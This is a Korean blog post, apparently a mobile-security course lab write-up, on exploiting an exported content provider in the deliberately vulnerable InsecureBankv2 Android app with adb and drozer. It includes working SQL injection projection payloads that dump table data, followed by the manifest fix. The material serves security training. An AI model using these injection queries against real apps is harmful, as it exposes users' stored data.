SECURITY/Android

[모바일보안] Lab5 : 안전하지 않은 콘텐츠 프로바이더 접근

2023. 4. 3. 16:47
목차
  1. 1 AndroLabServer 구동
  2. 2 adb를 이용한 콘텐츠 프로바이더 접근 취약점 분석
  3.  
  4. 3 drozer를 이용한 콘텐츠 프로바이더 접근 취약점 분석
  5.  
  6. 4 콘텐츠 프로바이더 접근 취약점 방어

1 AndroLabServer 구동

(1) PowerShell을 띄우고 아래 명령어를 실행한다.

cd ~\\Desktop\\InsecureBankv2\\AndroLabServer

(2) 그리고 다음의 명령어를 실행함으로써 AndroLabServer를 구동한다.

python .\\app.py

(3) 서버가 정상적으로 구동하면 아래의 메시지가 출력된다.

 

2 adb를 이용한 콘텐츠 프로바이더 접근 취약점 분석

(1) 콘텐츠 프로바이더 URI를 이용하여 다른 애플리케이션 데이터를 액세스 할 수 있다.

  • InsecureBankv2 앱에 있는 콘텐츠 프로바이더 URI를 탐색하기 위해서 AstroGrep 툴을 사용한다.
  • astrogrep 툴을 다운로드 받아서 바탕화면에 설치한다.
  • URI 정보는 smali 파일들에 있으므로 (2)번 ~ (4)번 과정을 수행하여 InsecureBankv2 앱에 대응되는 smali 파일들을 획득한다.

(2) apktool을 다운로드 받아서 설치한다.

(3) 안드로이드 스튜디오에서 InsecureBankv2 프로젝트를 오픈하고 나서 Build -> Build APK를 선택한다.

(4) PowerShell상에서 ~\Desktop\InsecureBankv2\app\build\outputs\apk\debug

  • 폴더로 이동한 후 다음의 명령어를 수행하면 smali 파일들이 생성된다.

apktool d app-debug.apk

(5) AstroGrep 툴에서 content://를 검색어로 지정하고 탐색을 하면, 다음의 trackuser와 관련된 URI를 발견할 수 있다.

content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

(6) PowerShell 상에서 다음의 명령어를 실행하여 trackuser와 연관된 정보를 콘텐츠 프로바이더에 질의한다.

  • 사용자의 ID와 name이 출력됨
  • 사용자의 정보를 저장하는 DB가 존재한다는 것을 알 수 있음

adb shell content query --uri content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

(7) 질의에 대한 응답으로 ID와 사용자 이름과 관련된 정보가 출력되는 것을 확인한다. 이러한 정보가 데이터베이스에 있는 것으로 추측하여 drozer 툴을 이용하여 추가적인 취약점을 확인한다.

 

3 drozer를 이용한 콘텐츠 프로바이더 접근 취약점 분석

(1) PowerShell에서 다음의 명령어를 실행하여, 안드로이드 가상 디바이스 (AVD) 에 drozer 앱을 설치한다.

adb install drozer 앱의 이름 (완전한 경로 포함)

(2) 안드로이드 가상 디바이스 (AVD) 에 설치된 drozer 앱을 구동하고 내장된 drozer 서버를 활성화 시킨다.

(3) 안드로이드 가상 디바이스 (AVD) 에서 구동하는 drozer 서버의 포트(31415)와 PC의 로컬 포트(31415)를 연결하는 다음의 명령어를 PowerShell상에서 수행한다.

adb forward tcp:31415 tcp:31415

(4) drozer 앱에 내장된 서버에 콘솔 모드로 접속하는 다음의 명령어를 PowerShell상에서 수행한다.

drozer console connect

(5) 다음의 명령어를 drozer 프롬프트( dz>)상에서 수행함으로써 InsecureBankv2 앱에 content provider 취약점이 있는것을 확인한다.

run app.package.attacksurface com.android.insecurebankv2

(6) InsecureBankv2 앱의 콘텐츠 프로바이더 정보를 확인하기 위해서 다음의 명령어를 drozer 프롬프트( dz>)상에서 실행한다.

run app.provider.info –a com.android.insecurebankv2
  • com.android.insecurebankv2.TrackUserContentProvider Uri에 권한이 부여되어 있지 않은 것을 확인한다.

(7) 다음의 명령어를 drozer 프롬프트( dz>)상에서 실행한다.

run scanner.provider.finduris -a com.android.insecurebankv2
  • InsecureBankv2 앱에서 접근 가능한 콘텐츠 프로바이더가 content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers 인 것을 확인한다.

(8) 다음의 명령어를 drozer 프롬프트( dz>)상에서 실행한다.

run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
  • id와 name 정보들이 출력되는 것을 확인한다.

(9) SQL 인젝션 취약점이 있는지 확인하기 위해서 다음의 명령어를 drozer 프롬프트( dz>)상에서 실행한다.

run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers --projection "'"
  • 다음과 같은 에러 메시지가 출력되는 것을 확인한다.
  • 쌍따옴표 안에 따옴표를 하나 넣어서 에러 유발 → 어떻게 처리하는지 확인하는 것
  • SELECT ‘ FROM names ORDER BY name 에러로부터 SQL 인젝션 취약점이 있는 것으로 파악한다.
**unrecognized token: "' FROM names ORDER BY name" (code 1 SQLITE_ERROR): , while compiling: SELECT ' FROM names ORDER BY name**

(10) 다음의 명령어를 drozer 프롬프트( dz>)상에서 실행함으로써 SQL 인젝션 공격을 수행한다.

  • SQLITE_MASTER에 있는 모든 테이블을 확인하는 SQL문으로 출력 결과물에서 names라는 테이블을 확인할 수 있다.
  • * from SQLITE_MASTER where type='table';--을 통해 테이블의 모든 정보 확인해 출력
run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers --projection "* from SQLITE_MASTER where type='table';--"

(11) 다음의 명령어를 drozer 프롬프트( dz>)상에서 실행함으로써 names 테이블의 내용인 id와 name 정보들을 확인할 수 있다. 화면에 출력되는 내용을 캡처한다.

  • SELECT * from names— FROM names ORDER BY name
  • 시스템 상에 구현된 부분 + Projection에서 입력(사용자 제공)한 부분
run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers --projection "* from names;--"

 

4 콘텐츠 프로바이더 접근 취약점 방어

(1) 안드로이드 스튜디오 InsecureBankv2 프로젝트의 AndroidManifest.xml 파일에서 이름이 TrackUserContentProvider인 프로바이더를 찾아서 exported=false로 설정을 바꾼다.

(2) 다음의 명령어를 drozer 프롬프트( dz>)상에서 실행한 후, 화면에 출력되는 내용을 캡처한다. 해당 명령어가 권한 거부로 인해 실행되지 않은 것을 확인한다.

 

  1. 1 AndroLabServer 구동
  2. 2 adb를 이용한 콘텐츠 프로바이더 접근 취약점 분석
  3.  
  4. 3 drozer를 이용한 콘텐츠 프로바이더 접근 취약점 분석
  5.  
  6. 4 콘텐츠 프로바이더 접근 취약점 방어
'SECURITY/Android' 카테고리의 다른 글
  • [모바일보안] Lab8: 메모리 내 민감한 정보 저장
  • [모바일보안] Lab 6 : 취약한 암호화 실행
  • [모바일보안] Lab4 : 액티비티 컴포넌트 취약점
  • [모바일보안] Lap2 : 취약한 인증 메커니즘
yuujoeng
yuujoeng
IT and Information Security
yuujoeng
알감자는 공부중
yuujoeng
전체
오늘
어제
  • 🎁 (201)
    • SECURITY (80)
      • 관리보안 (27)
      • System (10)
      • System | Wargame (30)
      • Android (9)
      • Reversing (3)
      • AWS (1)
    • BLOCKCHAIN (45)
      • BlockChain (22)
      • Ethereum (23)
    • PROGRAMMING (30)
      • Web (16)
      • Android (6)
      • Spring (8)
    • IT (0)
      • Article (40)
      • RaspberryPi (5)

블로그 메뉴

  • HOME
  • TIKKLE

인기 글

hELLO · Designed By 정상우.
yuujoeng
[모바일보안] Lab5 : 안전하지 않은 콘텐츠 프로바이더 접근
상단으로

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.